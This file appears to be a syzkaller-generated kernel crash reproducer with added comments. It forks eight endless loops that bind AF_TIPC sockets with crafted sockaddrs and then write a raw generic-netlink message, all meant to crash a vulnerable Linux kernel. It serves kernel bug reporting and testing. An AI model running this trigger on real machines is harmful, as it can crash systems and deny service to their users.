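// https://syzkaller.appspot.com/bug?id=bddba6ce33aa2286aed84ee50a7281d2d3f910f4
// autogenerated by syzkaller (http://github.com/google/syzkaller)
//
// Kernel-crash reproducer. It is NOT an application: it exists only to replay
// one exact syscall sequence (AF_TIPC bind()s with hand-built 128-byte
// sockaddrs, then a raw NETLINK_GENERIC message) against a vulnerable kernel.
// Run it only inside a disposable VM: main() forks 8 children that call
// test() in an endless loop and never exit, and the syscalls are intended
// to crash the kernel. The byte constants below are the reproducer's payload
// and must not be "cleaned up"; only comments and the header list (which had
// been stripped to bare `#include` tokens, so the file did not compile) were
// touched. Constant names in comments are decoded from the Linux UAPI
// headers; confirm them against the target kernel before relying on them.
#define _GNU_SOURCE
#include <stdint.h>      /* uint8_t/uint16_t/uint32_t/uint64_t stores */
#include <string.h>      /* memset, memcpy */
#include <sys/syscall.h> /* __NR_* numbers */
#include <unistd.h>      /* syscall, fork, sleep */

static void test(void);

/* Child body: replay the syscall sequence forever (there is no exit path). */
void loop(void)
{
    while (1) {
        test();
    }
}

/* Return values of the syscalls, indexed by syzkaller's program position.
 * Only r[34] (the TIPC socket) and r[42] (the netlink socket) are read back. */
long r[45];

/* One iteration of the reproducer. All user memory is carved out of a single
 * MAP_FIXED anonymous mapping at 0x20000000; the fixed-address stores below
 * all fall inside [0x20000000, 0x20fff000). The mmap result is deliberately
 * unchecked (syzkaller style): if it fails, the first store simply faults. */
void test(void)
{
    memset(r, -1, sizeof(r));

    /* mmap(0x20000000, 0xfff000, PROT_READ|PROT_WRITE,
     *      MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) */
    r[0] = syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x6ul, 0x32ul,
                   0xfffffffffffffffful, 0x0ul);

    /* struct perf_event_attr at 0x20e7af88 (0x78 bytes):
     *   type = 1 (PERF_TYPE_SOFTWARE), size = 0x78, config = 0,
     *   sample_period = 6, everything else zero except the flag byte at
     *   +0x28 and two small fields near the end. The literal 0xd34 is
     *   truncated to 0x34 by the uint8_t cast — this is what the generator
     *   emitted and what the kernel actually saw, so it is kept verbatim. */
    *(uint32_t*)0x20e7af88 = (uint32_t)0x1;
    *(uint32_t*)0x20e7af8c = (uint32_t)0x78;
    *(uint8_t*)0x20e7af90 = (uint8_t)0x0;
    *(uint8_t*)0x20e7af91 = (uint8_t)0x0;
    *(uint8_t*)0x20e7af92 = (uint8_t)0x0;
    *(uint8_t*)0x20e7af93 = (uint8_t)0x0;
    *(uint32_t*)0x20e7af94 = (uint32_t)0x0;
    *(uint64_t*)0x20e7af98 = (uint64_t)0x6;
    *(uint64_t*)0x20e7afa0 = (uint64_t)0x0;
    *(uint64_t*)0x20e7afa8 = (uint64_t)0x0;
    *(uint8_t*)0x20e7afb0 = (uint8_t)0xd34; /* stores 0x34 (see above) */
    *(uint8_t*)0x20e7afb1 = (uint8_t)0x0;
    *(uint8_t*)0x20e7afb2 = (uint8_t)0x0;
    *(uint8_t*)0x20e7afb3 = (uint8_t)0x0;
    *(uint32_t*)0x20e7afb4 = (uint32_t)0x0;
    *(uint32_t*)0x20e7afb8 = (uint32_t)0x0;
    *(uint32_t*)0x20e7afbc = (uint32_t)0x0;
    *(uint64_t*)0x20e7afc0 = (uint64_t)0x0;
    *(uint64_t*)0x20e7afc8 = (uint64_t)0x0;
    *(uint64_t*)0x20e7afd0 = (uint64_t)0x0;
    *(uint64_t*)0x20e7afd8 = (uint64_t)0x0;
    *(uint64_t*)0x20e7afe0 = (uint64_t)0x0;
    *(uint32_t*)0x20e7afe8 = (uint32_t)0x7;
    *(uint64_t*)0x20e7aff0 = (uint64_t)0x7;
    *(uint32_t*)0x20e7aff8 = (uint32_t)0x0;
    *(uint16_t*)0x20e7affc = (uint16_t)0x0;
    *(uint16_t*)0x20e7affe = (uint16_t)0x0;
    /* perf_event_open(attr, pid = 0 (self), cpu = -1 (any), group_fd = -1,
     * flags = 0). The resulting fd is never used again. */
    r[28] = syscall(__NR_perf_event_open, 0x20e7af88ul, 0x0ul, 0xfffffffful,
                    0xfffffffffffffffful, 0x0ul);

    /* setsockopt(fd = -1, level = 0x10e, optname = 5, &0xffffff80, 4):
     * fd -1 means this fails with EBADF before the option is looked at;
     * it is fuzzer noise kept for fidelity. The 64-bit literal is truncated
     * to 0xffffff80 by the uint32_t cast. */
    *(uint32_t*)0x200d1ffc = (uint32_t)0xffffffffffffff80;
    r[30] = syscall(__NR_setsockopt, 0xfffffffffffffffful, 0x10eul, 0x5ul,
                    0x200d1ffcul, 0x4ul);

    /* First of three 128-byte sockaddrs with sa_family = 0x1e (AF_TIPC).
     * Layout is struct sockaddr_tipc: addrtype = 1, scope = 3, then a
     * nameseq of {type, lower, upper}; here all three are 0 — type 0 is
     * reserved for TIPC's topology service, which is the suspicious part of
     * this repro. Bytes beyond the 16-byte struct are fuzzer padding.
     * This bind() goes to fd -1 and fails with EBADF (noise). */
    *(uint16_t*)0x20d80f80 = (uint16_t)0x1e;
    memcpy((void*)0x20d80f82,
           "\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
           "\x00\x09\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
           "\xd6\x2e\x0a\x43\xa6\x32\xed\x49\x38\xd3\x6d\x73\xfb\x8f\x84"
           "\x01\xa3\xff\x59\x82\x9a\x2b\x0a\xfe\x7c\xe4\x3a\x4b\x24\x70"
           "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xf1\x60\xe7\xe5"
           "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\xf1\x31"
           "\x4a\x8e\xf1\x51\x62\x2c\xa5\xbd\xb9\xc8\xea\xd2\x00\x00\x77"
           "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x0e\xe5\x90\xc8\xb9\xf7"
           "\x0d\xc1\x36\xcb\x18\x4a",
           126);
    r[33] = syscall(__NR_bind, 0xfffffffffffffffful, 0x20d80f80ul, 0x80ul);

    /* socket(AF_TIPC (0x1e), SOCK_DGRAM (2), 0) — the socket under test. */
    r[34] = syscall(__NR_socket, 0x1eul, 0x2ul, 0x0ul);

    /* Second AF_TIPC sockaddr: addrtype = 1, scope = 3, nameseq
     * type = 0, lower = 0x0000b900, upper = 0x00470000 (little-endian
     * bytes at struct offsets 8..15). bind() on the real TIPC socket. */
    *(uint16_t*)0x20afb000 = (uint16_t)0x1e;
    memcpy((void*)0x20afb002,
           "\x01\x03\x00\x00\x00\x00\x00\xb9\x00\x00\x00\x00\x47\x00\x00"
           "\x00\x00\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
           "\xd6\x2e\x0a\x63\xa6\x32\xed\x49\x38\xd3\x6d\x73\xfb\x8f\x84"
           "\x01\xa3\xff\x59\x82\x9a\x2b\x0a\xfe\x7c\xe4\x3a\x4b\x24\x70"
           "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xf1\x60\xe7\xe5"
           "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\x51\xd2"
           "\x4a\xce\xf1\xf1\x62\x2c\xa5\xbd\xb9\xc8\xea\x31\x00\x00\x77"
           "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x04\x00\x00\x00\x00\xf7"
           "\x0d\xc1\x36\xcb\x18\x4a",
           126);
    r[37] = syscall(__NR_bind, r[34], 0x20afb000ul, 0x80ul);

    /* Third AF_TIPC sockaddr: addrtype = 1, scope = 3, nameseq all zero
     * again. Second bind() on the same already-bound socket. */
    *(uint16_t*)0x201bb000 = (uint16_t)0x1e;
    memcpy((void*)0x201bb002,
           "\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
           "\x00\x09\xa9\x79\xf3\x21\xb3\x0c\x7b\xc8\x79\x04\x05\xc7\xba"
           "\xd6\x2e\x0a\x53\xa6\x32\xed\x49\x38\xd3\x6d\x0e\x00\x00\x00"
           "\x00\x00\x00\x00\x82\x9a\x2b\x0a\x00\x06\xe4\x3a\x4b\x24\x70"
           "\xa0\xc5\x21\x66\x69\xca\x02\x1f\x6f\x65\xdc\xe0\x60\xe7\xe5"
           "\x8f\x35\x8c\x00\x02\xf0\x00\x01\x58\xd1\x9b\xcb\x31\x51\x31"
           "\x4a\x8e\xf1\xf1\x62\x0c\x85\xbd\xb9\xc8\xea\xd2\x00\x00\x77"
           "\xae\xb8\x1c\x90\x00\x1d\x6d\x7c\x98\x0e\xe5\x90\xc8\xb9\xf7"
           "\x0d\xc1\x36\xcb\x18\x4a",
           126);
    r[40] = syscall(__NR_bind, r[34], 0x201bb000ul, 0x80ul);

    /* Close the TIPC socket while its name bindings are still published —
     * the unbind-on-close path is what the following netlink traffic races. */
    r[41] = syscall(__NR_close, r[34]);

    /* socket(AF_NETLINK (0x10), SOCK_DGRAM (2), 16 (NETLINK_GENERIC)) and
     * write() of one raw message: nlmsghdr {len = 0x1c, type = 0x1f,
     * flags = 0x2007, seq = 0x08000127, pid = 0x1d} followed by a
     * genlmsghdr {cmd = 1, version = 0} and attribute bytes. nlmsg_len says
     * 28 but 34 bytes are written; the kernel trusts nlmsg_len. Type 0x1f
     * is a dynamically assigned genl family id — which family it hit on the
     * crashing kernel cannot be read off this file. */
    r[42] = syscall(__NR_socket, 0x10ul, 0x2ul, 0x10ul);
    memcpy((void*)0x20fdb000,
           "\x1c\x00\x00\x00\x1f\x00\x07\x20\x27\x01"
           "\x00\x08\x1d\x00\x00\x00\x01\x00\x00\x00"
           "\x00\x00\x00\x00\x06\x00\xf7\x00\x00\x02"
           "\x00\x19\xfa\x97",
           34);
    r[44] = syscall(__NR_write, r[42], 0x20fdb000ul, 0x22ul);
}

/* Spawn 8 children that each run loop() forever, then park the parent for
 * ~11.5 days. Nothing reaps the children; fork() failure is ignored (the
 * parent just spawns fewer workers). Intended for a throwaway VM only. */
int main(void)
{
    int i;
    for (i = 0; i < 8; i++) {
        if (fork() == 0) {
            loop();
            return 0;
        }
    }
    sleep(1000000);
    return 0;
}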